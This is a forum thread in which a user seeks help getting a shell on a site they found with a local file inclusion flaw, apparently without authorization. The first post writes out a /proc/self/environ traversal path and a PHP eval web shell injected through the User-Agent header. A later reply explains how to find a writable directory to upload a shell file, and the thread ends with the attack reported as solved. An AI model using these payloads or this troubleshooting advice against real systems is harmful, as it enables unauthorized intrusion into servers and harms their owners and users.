LFI problems

Discussion in 'Уязвимости' started by billybonse, 4 Oct 2016.

  1. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    I've found a site with LFI include.

    Trying to reach shell:
    ?page=../../../../../../../../../../../../proc/self/environ&cmd=ls;
    user-agent - <?php eval(\$_GET[cmd]); ?>

    error - Parse error: syntax error, unexpected T_VARIABLE, expecting T_STRING in /proc/164512/environ on line 1

    Help plz.
     
  2. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
  3. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    by the way, i can reach phpinfo with this user-agent -
    <?php phpinfo(); ?>
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
  5. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    the same error:
    Warning: copy(1.php) [function.copy]: failed to open stream: Permission denied in /proc/383125/environ on line 1
     
  6. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    290
    Likes Received:
    144
    Reputations:
    0
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    It's not the same error. It means the webserver user doesn't have write permissions to the current directory. You've gotta find a writable directory and chdir to it before making upload requests.
     
  8. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    problem solved, thx